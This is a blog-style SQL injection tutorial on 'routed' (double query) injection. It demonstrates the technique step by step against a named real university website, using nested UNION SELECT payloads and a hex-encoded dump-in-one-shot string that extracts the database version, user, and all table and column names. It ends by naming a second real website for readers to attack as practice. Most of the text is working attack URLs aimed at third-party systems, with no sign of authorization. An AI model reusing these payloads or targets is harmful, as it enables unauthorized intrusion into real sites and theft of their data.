Double Query SQl injection | Routed SQL injection

Routed SQL Injection may sound a little bit different or tough for many of the injector being a new concept which confuse many of the injectors.

Routed SQL injection is a situation where the injectable query is not the one which gives output but the output of injectable query goes to the query which gives output.

In simple words routed SQL injection can be a scenario when you are not able to see any output after using "union select", earlier when i was playing with SQL Injection i found a website where i was not getting any output so it just strike through my mind that may be the output is not coming to the page then it must be going somewhere, and that somewhere is an another sql query.
---------------------------------------------------------------------------------------------------------------

          ~~~:::DeMO TimE :: ~~~
---------------------------------------------

It is our Target For Routed SQL !!!
PHP Code::

https://www.mylakehead.ca/?pageid=40

To confirm it is vlunerable We Put ' Or " , )  etc ....

PHP Code ::

https://www.mylakehead.ca/?pageid=40'

Query fixed  !! 

https://www.mylakehead.ca/?pageid=40') --+

Now Going to Find Columns By using Order By !! ---

 https://www.mylakehead.ca/?pageid=40') order by 1--+

 https://www.mylakehead.ca/?pageid=40') order by 100--+

From This Way I FoUnd That It Has 13 Columns

Now Going To Find Vlunerable Column !!!

 https://www.mylakehead.ca/?pageid=.40')Union select 1,2,3,4,5,6,7,8,9,10,11,12,13--+

I Do Everything Like false ther Query True the Query It Doest Not show the

Vluberable Columns !!

 https://www.mylakehead.ca/?pageid=.40') And  False Union select 1,2,3,4,5,6,7,8,9,10,11,Null,Null--+

noThing Happend !! 

When I Null the 1 the Result Changed !! it Occurs Only For 1 ...
when i Change 1 into 111 the Result of Page also Changed :p

From Here I Guse It Is Routed SQLI ....

So ...

 https://www.mylakehead.ca/?pageid=.40')Union select "1'",2,3,4,5,6,7,8,9,10,11,12,13--+

It Generates Error which is SQLI ..Thats Good For Us !! --->

Query Fixing !!---

 https://www.mylakehead.ca/?pageid=.40')Union select "1'--+",2,3,4,5,6,7,8,9,10,11,12,13--+

To Find Columns Again !!

 https://www.mylakehead.ca/?pageid=.40')Union select "1' order by 1--+",2,3,4,5,6,7,8,9,10,11,12,13--+ 

IT has Also 13 Columns !

 https://www.mylakehead.ca/?pageid=.40')Union select "1' And 0 union select 1,2,3,4,5,6,7,8,9,10,11,12,13--+ ",2,3,4,5,6,7,8,9,10,11,12,13--+

As You Can See 3 ,6 and 5 Is vlunerable which is printed In Screen !! 

Now Going TO Dump direct Tables and Columns :D 
by Using Dios 

 https://www.mylakehead.ca/?pageid=.40')Union select "1' And 0 union select 1,2,concat/***/(0x223e3c2f7461626c653e3c2f6469763e3c2f613e3c666f6e7420636f6c6f723d677265656e3e3c62723e3c62723e3c62723e,0x3c666f6e7420666163653d63616d62726961207374796c653d726567756c61722073697a653d3320636f6c6f723d7265643e7e7e7e7e7e3a3a3a3a3a496e6a65637465642062792041664768416e493a3a3a3a3a7e7e7e7e7e3c62723e3c666f6e7420636f6c6f723d626c75653e2056657273696f6e203a3a3a3a3a3a3a203c666f6e7420636f6c6f723d677265656e3e,version(),0x3c62723e3c666f6e7420636f6c6f723d626c75653e204461746162617365203a3a3a3a3a3a3a203c666f6e7420636f6c6f723d677265656e3e,database(),0x3c62723e3c666f6e7420636f6c6f723d626c75653e2055736572203a3a3a3a3a3a3a203c666f6e7420636f6c6f723d677265656e3e,user(),0x3c62723e3c666f6e7420636f6c6f723d7265643e205461626c657320203c2f666f6e743e203a3a3a3a3a3a3a3a3a3a3a3a203c666f6e7420636f6c6f723d677265656e3e436f6c756d6e733c2f666f6e743e3c666f6e7420636f6c6f723d626c75653e,@:=0,%28Select+count(*)from%28information_Schema.columns)where(table_schema=database())and@:=concat/**/(@,0x3c6c693e,0x3c666f6e7420636f6c6f723d7265643e,table_name,0x3c2f666f6e743e203a3a3a3a3a3a3a3a3a3a3a2020203c666f6e7420636f6c6f723d677265656e3e,column_name,0x3c2f666f6e743e)),@,0x3c62723e3c62723e3c62723e3c62723e3c62723e3c62723e3c62723e3c62723e3c62723e),4,5,6,7,8,9,10,11,12,13--+ ",2,3,4,5,6,7,8,9,10,11,12,13--+

For Pratice !!! :D

www.agritechno.ch/index2.php?rub=11

Test Your  Skills !! :D

Posted in SQlbasics , SQLINJECTION